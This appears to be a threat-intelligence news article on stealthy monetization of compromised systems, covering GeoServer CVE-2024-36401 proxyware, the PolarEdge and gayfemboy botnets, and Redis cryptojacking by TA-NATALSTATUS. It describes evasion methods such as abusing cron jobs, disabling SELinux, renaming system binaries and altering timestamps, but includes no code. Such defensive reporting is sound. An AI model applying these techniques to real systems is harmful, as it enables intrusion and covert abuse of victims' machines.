In a significant shift in cybercrime, threat actors are moving away from easily detectable, aggressive resource exploitation toward more subtle and persistent monetization strategies. Recent campaigns are targeting known security vulnerabilities and exposed servers to create sophisticated, low-profile revenue streams. By leveraging compromised devices as residential proxies, cryptocurrency mining infrastructure, and IoT botnets, these attackers are generating passive income without raising red flags. This new approach not only makes detection more difficult but also allows for long-term exploitation, showcasing a notable evolution in the methods used to monetize compromised systems.
One of the primary campaigns identified involves the exploitation of CVE-2024-36401, a critical remote code execution vulnerability in OSGeo GeoServer. Attackers are using this flaw to drop custom executables that function as legitimate software development kits (SDKs) or modified apps. These applications are designed to generate passive income by sharing the victim’s internet bandwidth, effectively turning their device into a residential proxy. This method is particularly stealthy because it mimics a monetization strategy used by some legitimate app developers, making it difficult for victims to distinguish malicious activity from normal app behavior. The payloads, written in Dart, are distributed via a private file-sharing server, further evading detection by conventional security measures. By consuming minimal resources and operating covertly in the background, this campaign ensures a long-term, low-profile revenue stream for the attackers.
Beyond passive monetization, researchers have also detailed the infrastructure behind large-scale IoT botnets like PolarEdge and gayfemboy. PolarEdge, an Operational Relay Box (ORB) network, comprises compromised enterprise-grade firewalls, routers, and IP cameras. ORBs are valuable to attackers because they can quietly relay traffic in the background without disrupting the device’s core function, making detection by owners or ISPs unlikely. The botnet uses a custom TLS backdoor for encrypted command-and-control and log cleanup, and it has been observed on high, non-standard ports to bypass traditional network scans. Similarly, the gayfemboy botnet, a variant of the well-known Mirai malware, targets vulnerabilities in products from vendors like DrayTek, TP-Link, and Cisco. It is capable of targeting multiple system architectures and includes advanced evasion techniques, such as a “Killer” function that terminates itself if it detects sandbox manipulation. Both of these campaigns highlight the increasing sophistication and complexity of modern botnets.
Another significant campaign involves a threat actor known as TA-NATALSTATUS, which is targeting exposed Redis servers for cryptojacking. The attackers scan for unauthenticated Redis servers and then use legitimate commands to execute a malicious cron job. This script performs several actions, including disabling SELinux, blocking external connections to the Redis port to prevent rival actors, and terminating competing mining processes. An evolution of a previous attack campaign, this new version incorporates rootkit-like features to hide malicious processes and alter file timestamps to fool forensic analysis. The attackers even rename system binaries like ps and top to filter their malware from the output of standard tools, demonstrating a high level of sophistication in their defense evasion tactics.
The common thread running through these diverse campaigns is a strategic focus on stealth and persistence over aggressive resource exploitation. The attackers are leveraging known vulnerabilities to gain a foothold and then deploying highly customized, difficult-to-detect malware that can operate in the background for extended periods. This approach, whether through bandwidth sharing, relaying traffic via IoT botnets, or cryptojacking, prioritizes long-term, low-profile revenue generation. As these campaigns evolve, they incorporate advanced techniques such as custom protocols, rootkit-like features, and sandbox evasion to enhance their complexity and ability to evade detection. The sophistication of these attacks underscores the critical need for proactive, intelligence-driven defense strategies to combat the ever-growing threat landscape.
Reference:
